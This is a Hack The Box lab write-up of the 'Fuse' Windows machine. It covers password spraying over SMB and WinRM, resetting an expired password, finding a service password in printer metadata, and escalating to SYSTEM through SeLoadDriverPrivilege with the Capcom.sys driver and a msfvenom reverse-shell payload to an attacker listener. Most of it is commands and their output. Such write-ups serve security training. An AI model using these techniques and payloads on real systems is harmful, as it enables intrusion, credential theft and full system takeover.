Posts Hackthebox Fuse writeup
Post
Cancel

Hackthebox Fuse writeup

Introduction@Fuse:~$

ColumnDetails
NameFuse
IP10.10.10.193
Points30
OsWindows
DifficultyMedium
Creatoraas
Out On13 June 2020

Brief@Fuse:~$

Got few usernames from the files from the website itself and making a custom wordlist from the website itself using cewl . Password Sparying using metasploit on the smb protocol , Got the correct username and password . Changed the password using smbpasswd and login to the rpcclient. Enumerating about printers . Got a password from the result , Again password sparying using crackmapexec on the winrm protocol got the username associated with it .Logged in using evil-winrm . The user is privileged to load the drivers as , And following an article compiling the necessary files using visual-studio and exploiting the SeLoadDriverPrivilege to get shell as administartor.

Summary :~$

  • GOt domain from enum4linux
  • Reading the execl-files got from website
  • Making a users.txt file for the users got from excel-files
  • making a custom-wordlist using cewl from the website itself
  • Bruteforce the smb protocol using metasploit and medusa
  • USing smbpasswd to reset the password of the user tlavel
  • Enumerating shares
  • Using rpcclient to enumerate users
  • Got printer information and a password from the enumprinters query
  • Login as svc-print
  • Got user.txt
  • Privilege-escalation by abusing SeLoadDriverPrivilege
  • Compling all the files
  • Generating a msf malicious file
  • Creating the registry key as the file capcom.sys using eoploaddriver.exe
  • Executing the ExploitCapcom.exe to run the shell.exe
  • Got shell as admin
  • Got root.txt

Pwned

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
➜  fuse nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
# Nmap 7.80 scan initiated Sat Jun 13 21:00:25 2020 as: nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
Nmap scan report for fuse.htb (10.10.10.193)
Host is up (0.34s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesnt have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-14 01:19:23Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49672/tcp open  msrpc        Microsoft Windows RPC
49690/tcp open  msrpc        Microsoft Windows RPC
49743/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/13%Time=5EE5780A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m10s, deviation: 4h02m31s, median: 13m08s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-13T18:21:53-07:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-14T01:21:55
|_  start_date: 2020-06-13T19:13:43

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 13 21:11:22 2020 -- 1 IP address (1 host up) scanned in 657.60 seconds

So many ports are opened , interesting ones are DNS , SMB ,Winrm , HTTP

Port 80 (HTTP)

Port-80

the fuse.htb is redirected to fuse.fabricorp.local …. added it to the /etc/hosts file

Fter adding and doing a refresh

Papercut

There is a papercut runningb on this http port . And there are also some excel files

Download the Excel files

I downloaded all the three files and opened them

1.

Excel files

2.

Excel files

3.

Excel file

These files contain some usernames i just extracted them all and save them in a users.txt

SMB Protocol

I tried to check if anonymous login is allowed or not on smb

1
2
3
4
5
6
7
➜  prashant smbclient -L fuse.htb
Enter WORKGROUP\roots password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available

Okay…so the anonymous login is allowed but we can not list the shares .

Enum4linux

1
2
➜  prashant enum4linux fuse.htb
Domain Name: FABRICORP                                                                                                                         

Got nothing rather than a domain-name : FABRICORP

Password Spraying on smb protocol

users.txt

1
2
3
4
5
➜  fuse cat users.txt 
pmerton
tlavel
sthompson
bhult

These excel-files contain some usernames i just extracted them all and save them in a users.txt

Now what ??

After some time i decided to build a custom-wordlist from the website using cewl so i can bruteforce the login on smb protocol

1
2
➜  fuse cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers 
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

i tried password spraying with the same users.txt file using metasploit on the smb protocol

Using metasploit

The module i used in msf is auxiliary/scanner/smb/smb_login to bruteforce the login

1
2
3
4
5
6
7
8
9
10
11
12
msf5 > use auxiliary/scanner/smb/smb_login                                                                    
msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist                                 
pass_file => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set USER_file users.txt 
USER_file => users.txt   
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb                                                                                          
RHOSTS => fuse.htb                                                                                                                    
msf5 auxiliary(scanner/smb/smb_login) >    
msf5 auxiliary(scanner/smb/smb_login) > run

[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'

Using medusa

1
2
3
4
5
6
7
➜  fuse medusa -h fuse.htb -U users.txt -P wordlist -M smbnt 

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>


ACCOUNT FOUND: [smbnt] Host: fuse.htb User: tlavel Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]
ACCOUNT FOUND: [smbnt] Host: fuse.htb User: bhult Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]

As i can see now that password is Fabricorp01 on which it got SUCCESS for both the users tlavel and bhult but it also says STATUS_PASSWORD_MUST_CHANGE.

Login using smbclient

1
2
3
➜  fuse smbclient -L fuse.htb -U tlavel        
Enter WORKGROUP\tlavel's password: 
session setup failed: NT_STATUS_LOGON_FAILURE

But i got the same error as got previously in medusa

Well we can reset the password using smbpasswd of a remote machine also if we know its old password…And since i know it so i can simply chnage the password

Changing smb password

1
2
3
4
5
➜  fuse smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on fuse.htb.

And yeah now i can list shares as user tlavel

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  fuse smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavels password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	HP-MFT01        Printer   HP-MFT01
	IPC$            IPC       Remote IPC
	NETLOGON        Disk      Logon server share 
	print$          Disk      Printer Drivers
	SYSVOL          Disk      Logon server share 
SMB1 disabled -- no workgroup available

After enumerating all the shares got nothing actually or i cant figured out thae thing i need.

Enumerating using rpcclient

I can reset the password again and login myself to rpcclient

1
2
3
➜  fuse rpcclient -U FABRICORP\\tlavel 10.10.10.193
Enter FABRICORP\tlavel's password: 
rpcclient $>

Enum users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $>

Okay…so i got some usernames here and i saved them to another file called users

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege 		0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege 		0:3 (0x0:0x3)
SeLockMemoryPrivilege 		0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege 		0:5 (0x0:0x5)
SeMachineAccountPrivilege 		0:6 (0x0:0x6)
SeTcbPrivilege 		0:7 (0x0:0x7)
SeSecurityPrivilege 		0:8 (0x0:0x8)
SeTakeOwnershipPrivilege 		0:9 (0x0:0x9)
SeLoadDriverPrivilege 		0:10 (0x0:0xa)
SeSystemProfilePrivilege 		0:11 (0x0:0xb)
SeSystemtimePrivilege 		0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege 		0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege 		0:14 (0x0:0xe)
SeCreatePagefilePrivilege 		0:15 (0x0:0xf)
SeCreatePermanentPrivilege 		0:16 (0x0:0x10)
SeBackupPrivilege 		0:17 (0x0:0x11)
SeRestorePrivilege 		0:18 (0x0:0x12)
SeShutdownPrivilege 		0:19 (0x0:0x13)
SeDebugPrivilege 		0:20 (0x0:0x14)
SeAuditPrivilege 		0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege 		0:22 (0x0:0x16)
SeChangeNotifyPrivilege 		0:23 (0x0:0x17)
SeRemoteShutdownPrivilege 		0:24 (0x0:0x18)
SeUndockPrivilege 		0:25 (0x0:0x19)
SeSyncAgentPrivilege 		0:26 (0x0:0x1a)
SeEnableDelegationPrivilege 		0:27 (0x0:0x1b)
SeManageVolumePrivilege 		0:28 (0x0:0x1c)
SeImpersonatePrivilege 		0:29 (0x0:0x1d)
SeCreateGlobalPrivilege 		0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege 		0:31 (0x0:0x1f)
SeRelabelPrivilege 		0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege 		0:33 (0x0:0x21)
SeTimeZonePrivilege 		0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege 		0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 		0:36 (0x0:0x24)
rpcclient $>

The user have some pretty good privileges on the machine

The website was about printers , Better if we just do some enum on printers.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
      adddriver		Add a print driver
     addprinter		Add a printer
      deldriver		Delete a printer driver
    deldriverex		Delete a printer driver with files
       enumdata		Enumerate printer data
     enumdataex		Enumerate printer data for a key
        enumkey		Enumerate printer keys
       enumjobs		Enumerate print jobs
         getjob		Get print job
         setjob		Set print job
      enumports		Enumerate printer ports
    enumdrivers		Enumerate installed printer drivers
   enumprinters		Enumerate printers
        getdata		Get print driver data
      getdataex		Get printer driver data with keyname
      getdriver		Get print driver information
   getdriverdir		Get print driver upload directory
getdriverpackagepath		Get print driver package download directory
     getprinter		Get printer info
    openprinter		Open printer handle
 openprinter_ex		Open printer handle
      setdriver		Set printer driver
getprintprocdir		Get print processor directory
        addform		Add form
        setform		Set form
        getform		Get form
     deleteform		Delete form
      enumforms		Enumerate forms
     setprinter		Set printer comment
 setprintername		Set printername
 setprinterdata		Set REG_SZ printer data
       rffpcnex		Rffpcnex test
     printercmp		Printer comparison test
      enumprocs		Enumerate Print Processors
enumprocdatatypes		Enumerate Print Processor Data Types
   enummonitors		Enumerate Print Monitors
createprinteric		Create Printer IC

There are some pretty good commands regarding the printers

enumprinters Enumerate printers

I cant list and enumerate the printers by using enumprinters

1
2
3
4
5
6
7
rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]

rpcclient $>

And herew I got lucky , Got a password here $fab@s3Rv1ce$1

Username spraying on winrm protocol

Now…since the winrm port is opened , And i can use crackmapexec or metasploit to spray usernames that i got from the rpcclient using enumdomusers

Using metasploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
msf5 auxiliary(scanner/winrm/winrm_login) > set PASSWORD '$fab@s3Rv1ce$1'                                                                
PASSWORD => $fab@s3Rv1ce$1                                                                    
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE users                                                                                  
USER_FILE => users                                                                                            
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.10.10.193                                                                                       
RHOSTS => 10.10.10.193                                                                                                                         
msf5 auxiliary(scanner/winrm/winrm_login) >                                                                                       
msf5 auxiliary(scanner/winrm/winrm_login) > run  
[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\pmerton:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\tlavel:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\sthompson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bhult:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bnielson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dandrews:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\mberbatov:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

using crackmapexec

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  fuse crackmapexec winrm -u users -p '$fab@s3Rv1ce$1' -d FABRICORP fuse.htb
WINRM       10.10.10.193    5985   fuse.htb         [*] http://10.10.10.193:5985/wsman
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\DefaultAccount:$fab@s3Rv1ce$1 "Failed to authenticate the user DefaultAccount with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\Administrator:$fab@s3Rv1ce$1 "Failed to authenticate the user Administrator with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\krbtgt:$fab@s3Rv1ce$1 "Failed to authenticate the user krbtgt with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\pmerton:$fab@s3Rv1ce$1 "Failed to authenticate the user pmerton with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\tlavel:$fab@s3Rv1ce$1 "Failed to authenticate the user tlavel with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\sthompson:$fab@s3Rv1ce$1 "Failed to authenticate the user sthompson with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\bhult:$fab@s3Rv1ce$1 "Failed to authenticate the user bhult with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\bnielson:$fab@s3Rv1ce$1 "Failed to authenticate the user bnielson with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\dandrews:$fab@s3Rv1ce$1 "Failed to authenticate the user dandrews with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\mberbatov:$fab@s3Rv1ce$1 "Failed to authenticate the user mberbatov with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\astein:$fab@s3Rv1ce$1 "Failed to authenticate the user astein with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\dmuir:$fab@s3Rv1ce$1 "Failed to authenticate the user dmuir with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\svc-scan:$fab@s3Rv1ce$1 "Failed to authenticate the user svc-scan with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)

The user is svc-print and i can login myself to the machine using evil-winrm

1
2
3
4
5
6
7
8
➜  fuse evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb                    

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print

Got user.txt

1
2
*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt
3148b09cce76eee40d9bc602744269c1

Privilege escaltion

Now its time for escalating the privileges

whoami /all

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-print\desktop>

The permission seems very suspicious

1
SeLoadDriverPrivilege         Load and unload device drivers Enabled

A quick google-search show me a good article on this

https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/

In this article its is shown that we cal load our own drivers and we can run a specific command as admin since we are already priviled to do it…

Compiling files

What i am gonna do is first compile both the two files

eoploaddriver.cpp

https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp

ExploitCapcom.cpp

https://github.com/tandasat/ExploitCapcom

I compiled both the files using Visual-studio and got the exe files as obvious

We need to specify our command in the files ExploitCapcom.cpp at the line 292 in function Launchshell()

1
2
3
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");

I changed the command to mine that will be a shell.exe so i can run my malicious binary created by msfvenom

1
2
3
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");

And one more file that is capcom.sys

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

Now first we need to create a shell.exe using msfvenom

Creating the malicious file

1
2
3
4
5
6
➜  files msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

And then upload all the four files to the machine

Uplaoding files

Uploading files

Upload file

After uploading all the four files….

Now Create the registry key under HKEY_CURRENT_USER (HKCU) and set driver configuration settings

The driver will be the file capcom.sys and its absolute path

Exploitation

1
2
3
4
5
*Evil-WinRM* PS C:\test> .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0

Now start listner on metasploit

and run the file .\ExploitCapcom.exe for the final exploitation

Execute the NTLoadDriver function, specifying the registry key previously created

1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\test> .\ExploitCapcom.exe                                                                              
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000002B6CF0B0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
*Evil-WinRM* PS C:\test>

And on our listener we got the shell as admin

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.4:4444 
[*] Sending stage (176195 bytes) to 10.10.10.193
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.193:50134) at 2020-06-17 02:27:11 -0400

meterpreter > shell
Process 576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\test>whoami
whoami
nt authority\system

Got root.txt

1
2
3
4
5
C:\Users\Administrator\Desktop>type root.txt
type root.txt
39bb8e320aecfcdd345fc2e7be64ceb7

C:\Users\Administrator\Desktop>

And we pwned it …….

If u liked the writeup.Support a Poor Student to Get the OSCP-Cert Donation for OSCP

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Resources

This post is licensed under CC BY 4.0 by the author.

© 2021 Prashant Saini.